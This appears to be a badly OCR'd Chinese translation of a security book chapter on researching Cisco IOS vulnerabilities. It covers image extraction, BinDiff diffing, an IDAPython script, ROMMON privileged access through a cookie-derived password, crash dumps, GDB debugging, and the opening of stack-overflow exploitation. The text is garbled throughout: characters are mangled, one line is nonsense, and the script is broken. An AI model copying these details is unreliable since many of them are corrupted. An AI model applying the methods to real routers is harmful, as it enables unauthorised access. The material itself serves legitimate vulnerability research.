额外 检查 都 会 导致 转发 性 能 下 降 ， 因 此 ， 一 般 都 不 会 这 样 做 。 所 以 ， 在 处 理 数据 包 的 过 程 中 很 少 
会 出 现 漏洞 。 最 有 可 能 的 例外 是 ， 出 于 安全 过 滤 的 原因 对 数据 包 进行 检查 。 

从 另 一 个 角度 讲 ， 路 由 器 提供 的 服务 也 的 确 暴 露 了 一 些 攻击 面 。 

在 IOS 里 ， 经 常 被 破坏 的 是 包 章 析 人 代码。 最 根本 的 原因 是 ，IOS 只 向 单独 的 开发 者 提供 了 最 
小 的 包 剖 析 功 能 。 为 什么 会 这 样 呢 ， 我 们 不 知道 个 中 原由 。 因 此 ， 只 能 假设 他 们 可 能 认为 对 于 简 
单 的 包 章 析 代码 来 说 ， 重 复 函 数 调 用 太 昂 贵 了 。 因 此 ， 在 思科 IOS 上 ， 大 多 数 服务 器 实现 用 指针 
指向 包 ， 手 工 剖析 它们 。 这 种 策略 虽然 提高 了 性 能 ， 但 显然 也 使 得 剖析 代码 更 容易 出 现 漏洞 。 处 
理 IPv4 的 代码 中 再 三 出 现 的 剖析 漏洞 面 就 是 最 明显 的 证 据 。 


13.2.1 协议 剖析 代码 

因为 IJOS 支 持 协 议 的 多 守 主 要 取决 于 它 的 映像 build， 而 处 理 这 些 协 议 的 例 程 是 路 由 器 上 最 常 
见 的 攻击 点 。 经 验 也 显示 出 它们 是 最 薄弱 的 攻击 点 。 思 科 路 由 器 支持 许多 稀奇 古怪 的 协议 ， 其 中 
一 些 剖析 起 来 非常 复杂 。 我 们 可 以 假设 在 它们 之 中 仍 隐 藏 了 很 多 漏洞 。 


13.2.2 ”路 由 器 上 的 服务 

在 更 高 的 层次 上 , 实际 服务 的 实现 是 一 个 有 趣 的 区 域 。 像 多 线程 和 进程 分 支 这 样 的 概念 是 不 
可 用 的 ， 要 求 IOS 开 发 者 通过 多 重 和 并 行 的 服务 请 求 来 瞒 过 它们 。 因 此 ， 当 把 它们 放 在 重 压 之 下 
或 故意 提供 冲突 信息 时 ， 具 有 复杂 状态 的 任何 东西 都 可 能 表现 异常 。 不 过 ， 这 种 情形 并 不 适用 于 
路 由 协议 本 身 。 路 由 协议 的 分 发 和 处 理 是 思科 的 核心 事务 ， 其 代码 〈 包 括 状态 机 ) 在 IOS 上 十 分 
稳定 。 


13.2.3 ”安全 特征 

和 其 他 的 网 络 安全 技术 一 样 ，IOS 里 额外 的 过 滤 和 防护 机 制 也 为 攻击 者 提供 了 新 的 攻击 途 
径 。 软 件 必须 检查 的 潜在 的 恶意 数据 越 多 ， 就 越 有 可 能 出 问题 。 随 着 思科 新 的 过 滤 和 加 密 服 务 的 
引入 ,就 需要 为 复杂 的 协议 增加 剖析 代码 ， 这 样 一 来 就 会 增加 新 的 攻击 面 。 思 科 近 来 的 目标 可 能 
是 入 侵 检测 、 内 容 过 滤 、 转 向 器 以 及 路 由 器 级 别 的 加 密 隧道 终端 。 

IOS 在 处 理 数据 包 的 过 程 中 可 能 会 遇 到 逻辑 bug。 这 些 bug 通 常 出 自 那些 没有 应 用 或 没有 正确 
应 用 了 过滤 规则 的 流量 过 滤 代码 中 ， 除 此 之 外 ， 也 可 能 会 涉及 包 转 发 部 分 。 我 们 不 必 非 要 利用 这 
些 bug 来 执行 代码 ， 可 以 用 精巧 制作 的 数据 滥用 它们 。 这 么 做 比较 有 意思 ， 因 为 路 由 器 转发 包 的 
方式 与 操作 者 认为 的 并 不 太一 致 ， 路 由 器 通常 可 以 访问 攻击 者 认为 不 可 能 到 达 的 系统 。 这 类 bug 
一 般 在 较 高 级 的 路 由 器 上 才 会 出 现 ， 因 为 思科 在 设计 时 会 尽 可 能 地 把 包 处 理 下 放 给 硬件 执行 。 另 
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一 方面 ， 防 火 墙 的 实现 代码 一 般 只 在 主 CPU 上 运行 。 所 以 ， 当 主 CPU 需 要 检查 流量 时 ， 路 由 器 必 
须 做 决定 ， 尽 管 这 些 流量 在 硬件 里 就 可 以 直接 转发 了 。 如 果 你 比较 关注 性 能 ， 那 么 这 些 决定 并 不 
好 做 。 在 过 去 ，TCP 中 不 管 是 建立 了 连接 的 还 是 没有 建立 连接 的 许多 过 滤 规 则 的 漏洞 都 表明 了 这 
一 点 。 在 思科 每 次 发 布 新 的 硬件 加 速 卡 时 ， 其 中 比较 高 级 的 防火 墙 功能 都 值得 检查 。 
13.2.4 ”命令 行 接口 

IOS 中 有 较 少 访问 限制 的 功能 区 是 思科 命令 行 接口 。 它 总 共 分 成 15 个 不 同 的 特权 级 。 用 户 级 
只 允许 非常 少 的 交互 ， 而 所 谓 的 enable 模 式 〈15 级 ) 则 可 以 完全 访问 路 由 器 。 一 般 很 少见 到 有 管 
理 员 人 允许 许多 用 户 访问 较 少 的 特权 模式 , 因为 大 部 分 网 管 并 不 乐意 其 他 人 登录 他 们 的 路 由 器 。 然 
而 ， 如 果 攻 击 者 使 用 监控 工具 (比如 sniffer) 就 有 可 能 获得 用 户 访问 ， 但 他 们 偏偏 又 钻 记者 enable 
模式 。 在 这 种 情形 下 , 剖析 和 处 理 命令 行 输入 的 漏洞 迟早 会 派 上 用 场 。 以 前 已 经 有 这 样 的 案例 了 ， 
比如 格式 化 问题 ， 尽 管 这 些 问题 由 于 缺乏 sn 格式 符 而 不 能 直接 利用 。 
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如 果 只 是 为 了 寻找 新 漏洞 ， 就 没 必 要 对 IOS 映 像 进 行 逆向 分 析 ， 因 为 模糊 测试 可 以 很 好 地 完 

成 这 个 任务 。 但 是 一 旦 找到 了 漏洞 ， 就 需要 理解 触发 漏洞 时 的 代码 上 下 文 、 内 存 布局 以 及 随后 出 
现 的 东西 。 因 此 ， 仍 需要 你 能 看 懂 代 码 。 

要 想 从 思科 获取 映像 文件 ， 需 要 有 一 个 CCO 账 号 , 通常 只 有 有 限 的 合伙 人 才 有 。 如 果 没 有 这 

样 的 账号 也 不 要 着 急 , IOS 提 供 了 把 路 由 器 当前 使 用 的 映像 复制 到 TFTP 服 务 器 的 功能 ,步骤 如 下 : 


radiotcopy flash tftp 


PCMCIA flash directory: 
File Length Name/status 
1 3494896 c1600-y-1.112-26.P4.bin 
[3494960 bytes used, 699344 available, 4194304 total] 
Address or name of remote host [255.255.255.255]? 192.168.2.5 
Source file name? c1600-y-1.112-26.P4.bin 
Destination file name [c1600-y-1.112-26.P4.bin]? 
Verifying checksum for 'c1600-y-1.112-26.P4.bin' (file # 1)... OK 
Copy 'ci600-y-1.112-26.P4.bin' from Flash to server 
as 'c1600-y-1.112-26.P4.bin'? [yes/no]yes 


除了 映像 文件 外 , 安全 研究 者 还 需要 准备 一 个 高 性 能 的 工作 站 (映像 文件 可 不 算 小 啊 )、 IDA 
Pro 的 安装 程序 以 及 该 硬件 平台 (CPU) 所 对 应 的 文档 资料 。 


13.3.1 仔细 齐 析 映像 

IOS 的 映像 文件 以 扩展 名 .bin 结尾 。 几 乎 所 有 的 喘 像 文 件 都 压缩 过 ， 它 们 在 启动 时 会 被 解压 
缩 。 因 此 ， 上 映像 文件 头 部 一 般 都 包含 了 用 于 解压 缩 的 前 二 进 制 同 步 码 。 比 较 小 的 路 由 器 使 用 的 老 
的 映像 文件 〈 例 如 IOS 11.0) 一 般 直 接 以 代码 开始 。 如 今 ，IOS 映 像 文件 一 般 以 ELF 二 进 制 的 形式 
` 出现。 这 两 种 类 型 的 映像 文件 都 在 头 部 包含 了 解压 缩 代码 。 
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把 IOS 映 像 文 件 加 载 到 IDA 之 前 ， 必 须 把 前 同步 码 部 分 去 掉 ， 从 而 得 到 真正 的 压缩 映像 。 要 
完成 这 个 任务 ， 最 简单 的 方法 是 搜索 ZIP 压 缩 库 的 神奇 数字 0x50 0x4B 0x03 0x04， 并 删除 在 此 
之 前 的 内 容 。 把 处 理 后 的 文件 保存 为 以 .ZIP 扩 展 名 结尾 的 文件 ， 就 可 以 用 解压 缩 程序 解压 它 了 。 
根据 映像 文件 提供 功能 的 多 少 ，ZIP 文 件 可 能 会 包括 一 个 或 多 个 文件 。 不 过 ， 对 于 常见 的 路 由 器 
来 说 ， 一 般 只 有 一 个 文件 。 

一 旦 获得 真正 的 映像 文件 ， 就 可 以 把 它 载 入 IDA Pro 了 。 





警告 在 主 频 为 3GHz 的 机 器 上 ， 分 析 2600 系 列 路 由 器 上 只 支持 基本 IP 路 由 功能 的 映像 文件 所 需 
要 的 时 间 可 能 会 超过 24 小 时 ; 而 分 析 7200 系 列 使 用 的 只 支持 的 12.4 映 像 文 件 所 花费 的 时 
间 可 能 会 超过 两 天 。 


在 一 些 架构 体系 上 ，IDA 生 成 的 交叉 引用 〈cross references). 可 能 没什么 价值 。 如 果 IDA 识 别 
出 的 字符 串 没 有 针对 代码 位 置 做 交叉 引用 ， 那 么 可 以 用 IDA Python 脚本 使 它们 各 归 其 位 。 


13.3.2 ”比较 IOS 映像 文件 

就 IOS 映 像 文件 来 说 ， 找 出 各 版 本 间 的 不 同 点 是 相当 有 趣 的 。 每 当 思科 发 布 新 版 本 时 ， 对 我 
们 来 说 ， 就 是 发 现 新 版 本 里 已 经 被 修改 的 、 有 可 能 被 利用 的 条 件 〈condition) 的 好 机 会 。 对 两 个 
顺序 发 布 的 IOS 映 像 文件 做 三 进 制 比较 (diff), 很 可 能 会 发 现 新 版 本 里 有 初始 化 变量 之 类 的 操作 ， 
而 在 老 版 本 里 ， 这 些 变量 在 使 用 前 并 没有 被 初始 化 ， 另 外， 新 版 本 里 也 可 能 完善 了 对 包 的 检查 、 
增加 或 删除 包 处 理 过 程 中 的 某 个 函数 。 

为 两 个 二 进 制 映像 文件 生成 diff， 最 好 使 用 SABRE Security 公 司 的 BinDiff。 从 原理 上 讲 ， 它 
对 两 个 二 进 制 文件 里 的 所 有 函数 进行 处 理 ， 生 成 指纹 ,然后 匹配 指纹 相同 的 函数 。 如 果 函 数 不 一 
致 ， 但 由 于 它们 在 两 个 二 进 制 里 所 处 的 位 置 差 不 多 ， 就 可 以 认为 它们 是 一 样 的 ， 只 不 过 有 些 修改 
罢了 。 因 为 BinDiff 的 工作 是 以 函数 为 基础 的 ， 所 以 需要 对 这 两 个 映像 文件 的 IDA 数 据 库 进 行 结构 
化 处 理 。IDA 通 常 不 能 识别 出 所 有 的 函数 ， 因 此 ， 它 会 遗留 大 量 不 属于 任何 函数 的 代码 块 。 但 思 
科 显 然 是 用 GNU 工 具 系 列 编译 代码 的 , 所 以 几乎 可 以 这 样 说 , 下 一 个 函数 开始 的 地 方 一 定 是 上 一 
个 函数 结束 的 地 方 。 为 了 把 所 有 不 属于 函数 的 代码 转换 成 函数 , 可 以 使 用 下 面 的 IDAPython 脚 本 : 

running = 1 


address = get_screen_ea() 
seaddress = SegEnd( address ) 




















while ( running == 1 ): 
naddress = find not func( address, SEARCH DOWN ) 
if ( BADADDR !- naddress ): 
MakeFunction( naddress, BADADDR ) 
address - naddress; 


if ( get item size( address ) == 0): 
running = 0 
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address = address + get_item_size( address ) 


if ( address == BADADDR): 
running = 0 

if ( address >= seaddress ): 
running = 0 


值得 一 提 的 是 ， 下 面 这 个 脚本 运行 的 时 间 相当 长， 映像 文件 一 旦 用 这 种 方式 处 理 后 ， 就 可 以 
进行 真正 的 di 和 了， 这 又 为 研究 人 员 腾 出 很 多 时 间 做 其 他 事情 。 一 旦 di 人 完成，BinDift 将 把 它 识 别 
的 已 经 改变 了 的 函数 列 出 来 。 在 显示 的 条 目 上 单 击 选择 visual diff， 则 可 以 用 流向 图 〔( 带 有 修改 过 
的 代码 块 及 用 颜色 区 分 的 指令 序列 ) 的 形式 比较 这 两 个 函数 了 。 

应 该 注意 ， 做 di 在 的 两 个 IDA 数 据 库 中 ， 至 少 有 一 个 的 输入 函数 应 该 有 描述 名 ， 特 别 是 在 处 
理 崩 溃 的 路 由 器 、 日 志和 调试 输出 等 情形 时 。 这 把 任务 简化 成 识别 为 了 安全 的 原因 而 悄然 修复 相 
关 bug 所 做 的 改动 ， 因 为 改动 通常 会 涉及 新 的 或 改变 了 的 调试 输出 字符 串 。 

13.3.3 ”运行 时 分 析 

一 旦 找到 一 个 新 漏洞 ， 并 且 可 以 在 路 由 器 上 重 现 这 个 问题 ， 研 究 者 就 要 识别 出 它 的 类 型 、 发 
生地 点 ， 以 及 可 以 利用 它 做 些 什么 。 如 果 没 有 运行 时 分 析 工 具 ， 分 析 超 来 会 很 麻烦 ， 我 们 也 不 推 
荐 这 样 做 ， 因 为 整个 过 程 其 实 就 是 元 长 的 发 送 包 和 反复 实验 以 推测 暗 处 发 生 了 什么 的 过 程 。 

1. 思科 路 由 器 携带 的 工具 

Cisco 路 由 器 自 带 了 一 些 最 基本 的 工具 ， 可 以 在 调试 崩溃 情形 时 使 用 。 有 两 个 级 别 : IOS 本 身 
生成 的 crash 转 储 ，ROMMON 的 功能 。 

€ ROMMON 

ROMMON 对 于 思科 路 由 器 来 说 ， 相 当 于 现代 桌面 机 的 EFI BIOS。 它 是 最 小 的 加 载 代码 ， 在 
真正 的 主 映像 文件 被 解压 缩 和 启动 前 ， 会 依次 载 入 最 小 的 IOS 实 现 。 不 同系 列 路 由 器 上 的 
ROMMON 在 功能 上 有 很 大 差别 。 老 的 和 较 小 的 路 由 器 只 有 简单 的 接口 ， 只 允许 设置 少量 的 boot 
参数 。 而 现代 路 由 器 允许 更 新 ROMMON 代 码 ， 而 且 提 供 了 更 加 丰富 的 功能 。 

只 能 通过 串 行 控制 台 线 缆 使 用 ROMMON, 这 里 也 只 能 用 基本 的 网 络 代 码 。 在 路 由 器 启动 时 ， 
用 户 必须 按 下 CTRL+Break 来 中 断 正 常 的 启动 过 程 ， 从 而 进入 ROMMON。 

System Bootstrap, Version 11.1(7)AX [kuong (7)AX], EARLY DEPLOYMENT 


RELEASE SOFTWARE (fc2) 
Copyright (c) 1994-1996 by cisco Systems, Inc. 


Simm with parity detected, ignoring onboard DRAM 
C1600 processor with 16384 Kbytes of main memory 


monitor: command "boot" aborted due to user interrupt 


rommon 1 > 


当 从 ROMMON (fit boot) "FUB ay ERR RRA ERR RAIN, BR HESS IK ER ESE 
做 出 不 同 的 反应 。 在 正常 情形 下 ， 主 映像 将 显示 崩溃 信息 并 重启 。 当 从 ROMMON 里 启动 时 ， 路 
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由 器 将 返回 崩溃 发 生 后 的 地 方 ， 研 究 者 可 以 检查 内 存 位 置 和 寄存 器 内 容 ， 并 大 致 分 析 一 下 事态 ; 


*** BUS ERROR *** 

access address - 0x58585858 

program counter = 0x400alfe 

Status register - 0x2400 

vbr at time of exception - 0x4000000 
special status word = 0x2055 

faulted cycle was a word read 


monitor: command "boot" aborted due to exception 
rommon 3 > context 
CPU Context: 


dO - 0x00000000 a0 - 0x0400618e 
dl - 0x0200f6e4 al - 0x0202b1d8 
d2 - 0x00000002 a2 - Oxf4000000 
d3 - 0x04005bf2 a3 - 0x0207f£534 
d4 - 0x020700d6 a4 - 0x0207£4£0 
d5 - Oxf4000000 a5 - 0x0207beac 
d6 - 0x000000d6 a6 - 0x0207f4ac 
d7 - 0x00000000 a7 - 0x0207f488 
pc - 0x0400a200 vbr - 0x04000000 


sr - 0x2400 

rommon 4 » sysret 

System Return Info: 

count: 19, reason: bus error 
pc:0x400a200, error address: Oxf4000000 
Stack Trace: 

FP: 0Ox0207f4ac, PC: 0x0400b3e8 
FP: 0x0207f4bc, PC: 0x04005e3a 
FP: 0x0207f4e8, PC: 0x04000414 
FP: 0x00000000, PC: 0x00000000 
FP: 0x00000000, PC: 0x00000000 
FP: 0x00000000, PC: 0x00000000 
FP: 0x00000000, PC: 0x00000000 
FP: 0x00000000, PC: 0x00000000 


在 ROMMON 里 可 以 进入 特权 模式 。 这 样 就 可 以 读 / 写 内 存 内 容 ， 户 用 或 禁止 NVRAM 上 的 写 
保护 了 ， 最 重要 的 是 ， 可 以 跳 到 任意 内 存 位 置 并 设置 断 点 。 这 将 使 概念 验证 (proof-of-concept) 
的 开发 工作 比重 复 触发 漏洞 进行 试验 更 简单 一 些 ， 可 以 把 研究 员 从 跟踪 未 泄露 的 IOS 漏 洞 工作 中 
解放 出 来 ， 这 在 安全 方面 实在 是 再 好 不 过 了 。 

根据 机 器 的 具体 设置 ， 有 些 机 器 在 进入 ROMMON 特 权 模 式 时 可 能 需要 密码 。 如 果 是 这 样 ， 
必须 在 ROMMON 里 执行 命令 生成 机 器 cookie: 


rommon 1 > cookie 


cookie: 
01 01 00 60 48 A£ 5e 73 09 00 00 00 00 07 OO 00 
05 71 49 52 00 00 00 00 00 00 00 00 OO 00 00 OO 
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可 用 这 些 cookie 信 息 计算 特权 模式 密码 。 为 了 获得 密码 ， 考 虑 输出 的 前 16 位 十 六 进 制 值 ， 可 
以 把 前 5 个 值 相 加 : 


0101 
0060 
484£f 
5e73 
0900 
b123 


根据 具体 的 硬件 平台 ， 需 要 考虑 大 小 端的 问题 〈 必 要 时 要 调整 字 节 序 )， 因 为 ROMMON 的 
开发 者 显然 没有 考虑 到 不 同 的 机 器 (硬件 架构 ) 其 字 节 序 可 能 并 不 一 样 。 确 保 十 六 进 制 数字 中 的 
字母 是 小 写 的 。 如 果 计算 结果 超出 4 位 ， 把 左边 的 数字 位 数 大 的 数字 ) 删 去 ， 剩 下 的 4 位 就 是 密 
码 了 。 一旦 得 到 密码 ， 就 能 进入 特权 模式 了 : 


rommon 2 > priv 


n+ + + o 


Password: 

You now have access to the full set of monitor commands. 
Warning: some commands will allow you to destroy your 
configuration and/or system images and could render 

the machine unbootable. 


上 面 显示 的 警告 消息 表明 密码 是 正确 的 ， 你 应 该 认真 对 待 ， 因 为 如 果 输 入 的 密码 错误 ,除了 
显示 正常 的 ROMMON 提 示 符 外 ， 什 么 都 不 显示 。 一 旦 进入 特权 模式 ， 可 以 用 help 命 令 显示 新 获 
得 的 功能 。 

e 崩溃 转 储 

另 一 个 非常 有 用 的 功能 是 生成 月 省 转 储 。 这 个 功能 随 着 时 间 的 流逝 有 了 一 些 改 进 , 因此 , TOS 
的 版 本 越 新 ， 它 提供 的 信息 就 越 有 用 。 目 前 ，IOS 支 持 把 月 溃 信 息 写 到 机 器 的 flash 文 件 系统 或 内 
存 卡 里 。 此 外 ， 它 还 可 以 通过 TFTP 把 内 存 转 储户 溃 文 件 写 到 远程 机 器 上 。 这 两 个 功能 将 以 转 储 
的 方式 展示 当前 所 研究 的 IOS 版 本 的 信息 。 为 了 使 设备 在 内 存 崩 溃 时 生成 转 储 信息 ， 必 须 调整 路 
由 器 配置 : 


radiotstconf t 

Enter configuration commands, one per line. End with CNTL/Z. 

radio(config)#exception core-file radio-core 

radio(config)#exception dump 192.168.2.5 

radio(config)s4^Z 

如 果 配 置 之 后 ， 路 由 器 并 没有 出 现 裔 溃 的 情形 ， 我 们 就 可 以 通过 执行 write core 命 令 测试 
配置 是 否 正确 。 老 版 本 的 IOS 通 过 TFTP 把 转 储 信息 写 到 配置 时 指定 文件 名 的 文件 里 。 新 版 本 的 
IOS 将 生成 两 个 文件 ， 一 个 包含 主 内 存 的 信息 ， 另 一 个 包含 路 由 器 IO 内 存 区 的 信息 ， 并 把 当前 的 
日 期 和 时 间 信 息 作为 崩溃 分 析 文 件 的 简短 描述 。 

对 于 一 些 老 型 号 的 路 由 器 ， 朋 溃 转 储 里 的 信息 并 不 全 。 针 对 这 种 情形 ， 我们 可 以 记录 骨 演 过 
程 中 串口 Cserial console) 输出 的 信息 。 新 型 号 路 由 器 生成 的 崩 省 分析 (crash info) 更 详细 一 些 。 
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现在 的 IOS 在 项 溃 时 ， 会 把 名 为 crashinfo YYYYMMDD-12345683 3C 4 F5 Aflah 4E RAB, B 
由 器 将 用 当前 的 日 期 替换 YYYYMMDD， 用 随机 的 十 进 制 数 蔡 换 123456。 我 们 可 以 通过 FTP、 
TFTP 或 RCP 把 崩溃 分 析 文 件 从 路 由 器 上 复制 到 主机 。 骨 溃 分 析 文件 包含 了 安全 研究 者 研究 漏洞 
时 所 需要 的 大 量 信息 : 
O 错误 消息 Cog) 和 命令 历史 记录 
口 对 册 演 时 正在 运行 的 映像 的 描述 
口 来 自 show alignment 的 输出 

a 堆 分 配 及 释放 操作 的 痕迹 

O 进行 级 栈 痕迹 

O 进程 级 上 下 文 

O 进程 级 栈 转 储 

中 断 级 栈 转 储 

a 进程 级 信息 

a 进程 级 寄存 器 引用 转 储 

IOS 12.1 或 12.2《 取 决 具体 的 平台 ) 之 后 的 版 本 就 可 以 生产 崩溃 分 析 文 件 了 。 进 程 级 寄存 器 
引用 转 储 的 信息 非常 有 用 ， 因 为 它 会 尝试 着 自动 识别 正在 讨论 的 寄存 器 正 指向 哪里 : 


Reg0O(PC ): 41414140 [Not RAM Addr] 
RegO01(MSR): 8209032 [Not RAM Addr] 
Reg02(CR ): 22004008 [Not RAM Addr 
) 
) 
) 

















Reg03 (LR ): 41414143 [Not RAM Addr] 
Reg04 (CTR): 0 [Not RAM Addr] 
Reg05 (XER): 20009345 [Not RAM Addr] 
Reg06 (DAR): 61000000 [Not RAM Addr] 
Reg07 (DSISR): 15D [Not RAM Addr] 
Reg08 (DEC): 2158F4B2 [Not RAM Addr] 
Reg09 (TBU): 3 [Not RAM Addr] 
Reg10(TBL): 5EA70B30 [Not RAM Addr] 
Reg1li(IMMR): 68010031 [Not RAM Addr] 
Regi2(RO ): 41414143 [Not RAM Addr] 
Regi3(R1 ): 82492DF0 

Reg14(R2 ): 81D40000 

Reg15(R3 ): 82576678 [In malloc Block 0x82576650] [Last malloc Block 0x82576504] 
Regl6(R4 ): 82576678 

Reg17(R5 ): 82576678 

Reg18(R6 ): 81F01C84 

Reg19(R7 ) O [Not RAM Addr] 
Reg20(R8 ) 4241 [Not RAM Addr] 
Reg21(R9 ): 0 [Not RAM Addr] 
Reg22(R10): 81D40000 

Reg23 (R11): 0 [Not RAM Addr] 


Reg24(R12): 22004008 [Not RAM Addr] 
Reg25(R13): FFFA8A24 [Not RAM Addr] 
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2. GDB Agent 

尽管 思科 路 由 器 携带 的 工具 提供 了 一 些 基本 的 调试 功能 , 但 研究 者 通常 不 满足 于 此 , 希望 能 
拥有 更 多 的 调试 能 力 ， 比如， 直接 在 反 汇 编 器 里 设置 断 点 ,观察 执 行 流 ,阅读 内 存 的 内 容 ， 等 等 。 
对 那些 调试 特定 路 由 器 IOS 里 最 新 问题 的 思科 工程 师 而 言 ， 这 已 经 成 为 现实 了 。 因 为 整个 IOS 映 
像 的 所 作 所 为 和 单片机 内 核 非 常 相似 ， 思 科 使 用 了 原本 是 操作 系统 开发 者 使 用 的 调试 技术 。 

思科 IOS 支 持 GDB 串 行 线路 远程 调试 协议 。 这 个 协议 允许 我 们 通过 串 行 接口 连接 控制 调试 目 
标 〈 路 由 器 )。 此 外 ，GDB 协 议 还 支持 TCP， 但 遗憾 的 是 思科 并 不 支持 这 种 模式 。GDB 串 行 线路 
远程 调试 协议 是 基于 文本 的 ， 思 科 对 公开 的 GNU 调 试 器 做 了 一 些 修 改 ， 因 此 ， 它 们 两 个 (GNU 
调试 器 原 有 的 和 思科 修改 过 的 ) 并 不 兼容 。SABRE Security 在 2006 年 发 布 了 命令 行 调 试 前 端 工具 
〈 也 是 BinNavi 的 调试 代理 )， 研 究 者 可 以 用 它 调试 支持 各 种 GDB 串 行 线路 协议 方言 的 设备 。 当 然 ， 
在 这 些 设备 中 也 包括 了 一 些 思科 的 平台 。 

虽然 修改 后 的 GDB 版 本 凑合 着 也 能 用 ， 但 如 果 与 BinNavi 集 成 ， 则 可 以 在 函数 内 或 多 个 函数 
间 跟 踪 代 码 执行 的 路 径 。 当 在 IOS 里 寻找 漏洞 并 构造 数据 包 时 ， 这 种 可 视 化 的 功能 提供 了 非常 有 
用 的 基于 测试 实现 代码 覆盖 的 信息 。 这 个 功能 还 有 助 于 查 明 某 个 特殊 的 包 为 什么 会 被 拒绝 或 不 被 
拒绝 ， 甚 至 在 IOS 输 出 的 调试 信息 没什么 帮助 时 也 能 应 用 它 。 研 究 者 通过 在 逻辑 块 〈《 实 际 的 代码 
流 脱 离 了 预定 的 轨道 ) 上 设置 断 点 ， 可 以 进一步 检查 决策 的 过 程 ， 并 找 出 数据 包 为 什么 被 拒绝 而 
不 是 被 处 理 的 具体 原因 。 

思科 及 其 他 一 些 册 入 式 系统 厂商 通过 他 们 标准 的 控制 台 实 现 串 行 线路 调试 .因此 必须 把 控制 
台 切 换 到 GDB 调 试 状态 。 为 了 在 思科 设备 上 调试 内 核 代码 ， 需 要 使 用 未 文档 化 的 命令 gab 
kernel。 这 条 命令 一 旦 被 输入 ， 系 统 将 停止 工作 并 显示 多 个 管道 符 (如 | | | |)。 这 是 GDB 协 议 的 
FAA (preamble)， 到 这 一 步 时 ， 你 就 可 以 关闭 终端 软件 ， 并 用 支持 GDB 串 行 线路 的 调试 器 控 
制 这 个 设备 。 记 住 ， 一 旦 用 continue 命 令 把 路 由 器 恢复 成 正常 的 操作 模式 ， 标 准 的 串 行 控 制 台 
输出 将 会 再 次 出 现 ， 因 为 向 控制 台 输 出 信息 是 IOS 核 心 功能 之 一 。 我 们 选用 的 调试 器 应 该 能 处 理 
这 种 情形 ， 因 为 在 这 个 时 刻 断 开 调 试 并 不 合适 ， 为 什么 昵 ? 因为 一 旦 发 生 了 异常 〈 例 如 断 点 被 触 
发 了 )， 控 制 台 就 会 返回 GDB 模 式 。 

使 用 板 载 的 ROMMON 功 能 就 可 以 在 思科 IOS 路 由 器 上 轻松 调试 漏洞 并 可 靠 地 执行 代码 。 但 
是 当 在 这 个 平台 上 前 析 bug 或 开发 验证 概念 的 shellcode 时 ， 使 用 GDB 串 行 线路 的 调试 器 就 是 首选 
T: 即使 不 是 由 于 其 改良 后 的 功能 ， 也 会 因为 使 用 ROMMON 会 稍微 改变 路 由 器 上 分 配 某 些 内 存 
区 的 方式 ， 从 而 破坏 原先 可 预计 的 地 址 。 
13.4 破解 思科 IOS 

一 旦 发 现 漏洞 ， 就 可 以 用 上 面 提 到 的 方法 检验 哪些 寄存 器 或 内 存 内 容 受 到 了 影响 。 基 于 栈 滋 
出 的 可 靠 迹象 是 出 现 立 即 总 线 错 误 或 类 似 的 异常 。 路 由 器 的 反应 时 间 差 不 多 要 20 秒 ， 因 为 它 可 能 
需要 Check Heaps 进 程 找 出 被 恶化 的 堆 数 据 结 构 。 可 以 用 debug sanity 命 令 加 速 这 一 检测 过 程 ， 
这 条 命令 将 对 IOS 堆 启用 另外 的 检查 。 
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13.4.1 Hub 

在 IOS 上 同样 ， 可 以 通过 栈 缓冲 区 溢出 获得 代码 执行 ， 就 像 在 其 他 平台 上 那样 。 目 标 都 是 改 
写 保 存 着 调用 函数 返回 地 址 的 栈 位 置 。IOS 上 的 栈 是 可 执行 的 ， 所 以 直接 返回 栈 缓冲 区 不 会 出 现 
任何 问题 。 

前 言 里 提 到 的 那些 平台 和 IOS 上 映像 在 这 里 才 开 始 真正 的 活动 。 攻 击 者 如 果 不 知道 目标 路 由 器 
的 型 号 ， 将 无 法 判断 它 使 用 了 何 种 CPU， 更 别 说 选择 正确 的 shellcode 了 。 第 二 个 障碍 是 IOS 用 单 
一 堆 分 配 的 块 作为 进程 栈 。 因 此 ， 进 程 的 栈 地 址 不 稳定 。 

为 了 获得 指定 进程 的 栈 地 址 ， 需 要 绕 到 IOS 的 进程 结构 里 。IOS 有 一 个 指向 结构 的 指针 数组 ， 


A -这 个 数组 包含 了 所 有 进程 的 上 下 文 信息 。 用 show memory allocating-process 命 令 〈 这 条 命 


令 将 列 出 内 存 块 ， 以 及 它们 被 分 配给 什么 进程 ， 包 括 用 它们 做 什么 ) 可 以 找到 这 个 数据 。 输 出 的 
内 容 还 包括 IOS 里 每 个 进程 的 Process stack 条目。 为 了 找到 进程 当前 的 栈 指 针 ， 首 先 需要 找到 
进程 ID。 用 进程 列表 命令 show processes cpu 可 以 完成 这 个 任务 。 至 此 ， 进 程 数 组 的 地 址 就 可 
以 用 了 。 当 转 储 进程 数组 内 存 块 的 内 存 时 ， 就 可 以 看 到 数组 了 : 


Address Bytes Prev. Next Ref Alloc Proc Alloc PC What 

2040D44 1032 2040CC4 2041178 1 *Init* 80EE752 Process Array 
2041178 1000 2040D44  204158C 1 Load Meter 80EEAFA Process Stack 
204158C 476 2041178 2041794 1 Load Meter 80EEBOC Process 
radiotsh mem 0x2040D44 - 

02040D40: AB1234CD FFFFFFFE 00000000 +.4M...~.... 


02040D50: 080EE700 080EE752 02041178 02040CD8 ..g...gR...X...X 
02040D60: 80000206 00000001 080EAEA2 00000000 ........... ur 


02040D70: 00000020 02041584 0209FCBC O2075FF8 ... ...4..|«...x 
02040080: 02076B8C 0207E428 020813B8 0208263C  ..k...d(...8..&« 
02040D90: 020ASFE0 020A7B10 020A8F3C 020C76A4  .. ^"..([....«..v$ 
02040DA0: 020C8978 020C9F2C 020CAA30 O20CE704  ...X...,.. *0..g. 
02040DB0: 020D12EC 020D47B8 020D5AB8 020DB30C  ...1..G8..28..3. 
02040DCO: 020DC5E0 020DDOE4 020DDBE8 O20DE6EC  ..E'..Pd..[h..fl 
02040DD0: 020E7BE8 020E8304 020E8E08 020E9DBC ..íh........... < 
02040DE0: 020EC5RA0 O20ED0A4 020EDBA8 O20EE6AC ..E ..P$..[(..f, 
02040DFO: 020A0268 00000000 00000000 00000000 ...h........ 


真正 的 数组 从 偏 移 量 0x02040D74 开 始 。 假 设 我 们 讨论 的 进程 是 Load Meter, 那么 在 上 面 的 例 
子 里 ， 它 的 PID 是 1， 现 在 可 以 检查 进程 信息 结构 : 


radio#sh mem 0x020415B4° 
020415B0: 020411A0 02041550 00001388  ... ... P.... 
020415C0: O80EDEE4 00000000 00000000 00000000 ..^d............ 


